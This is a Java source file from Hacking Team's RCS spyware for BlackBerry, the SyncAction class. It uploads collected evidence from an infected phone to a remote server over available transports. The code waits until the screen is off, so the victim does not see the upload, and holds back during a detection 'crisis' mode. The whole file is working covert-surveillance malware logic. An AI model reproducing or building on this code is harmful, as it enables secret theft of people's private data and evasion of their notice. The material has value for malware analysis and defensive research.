

/* *************************************************
 * Copyright (c) 2010 - 2011
 * HT srl,   All rights reserved.
 * 
 * Project      : RCS, RCSBlackBerry
 * *************************************************/

package blackberry.action.sync;

import java.util.Vector;

import net.rim.device.api.crypto.RandomSource;
import net.rim.device.api.system.Backlight;
import net.rim.device.api.system.DeviceInfo;
import blackberry.Status;
import blackberry.Trigger;
import blackberry.action.SubActionMain;
import blackberry.action.sync.protocol.ProtocolException;
import blackberry.action.sync.protocol.ZProtocol;
import blackberry.action.sync.transport.Transport;
import blackberry.config.ConfAction;
import blackberry.debug.Check;
import blackberry.debug.Debug;
import blackberry.debug.DebugLevel;
import blackberry.evidence.Evidence;
import blackberry.evidence.EvidenceCollector;
import blackberry.manager.ModuleManager;

public abstract class SyncAction extends SubActionMain {



    protected EvidenceCollector logCollector;
    protected ModuleManager agentManager;
    // protected Transport[] transports = new Transport[Transport.NUM];
    protected Vector transports;
    protected Protocol protocol;

    protected boolean initialized;

    public SyncAction(ConfAction conf) {
        super(conf);

        logCollector = EvidenceCollector.getInstance();
        agentManager = ModuleManager.getInstance();
        transports = new Vector();

        protocol = new ZProtocol();
        initialized = parse(conf);
        initialized &= initTransport();
    }

    public boolean execute(Trigger trigger) {





        if (status.crisisSync()) {



            return false;
        }


        if (Backlight.isEnabled() && !Status.getInstance().isDemo()) {
            return false;
        }


        if (DeviceInfo.getIdleTime() > 600 && RandomSource.getInt(10) == 0) {





            System.gc();
        }

        boolean ret = false;

        for (int i = 0; i < transports.size(); i++) {
            Transport transport = (Transport) transports.elementAt(i);






            if (transport.isAvailable()) {



                protocol.init(transport);

                try {
                    if (Status.self().wantLight()) {
                        Debug.ledFlash(Debug.COLOR_YELLOW);
                    }

                    ret = protocol.perform();

                } catch (ProtocolException e) {



                    ret = false;
                }




            } else {



            }

            if (ret) {






                return true;
            }





        }

        return false;
    }

    protected abstract boolean initTransport();

}
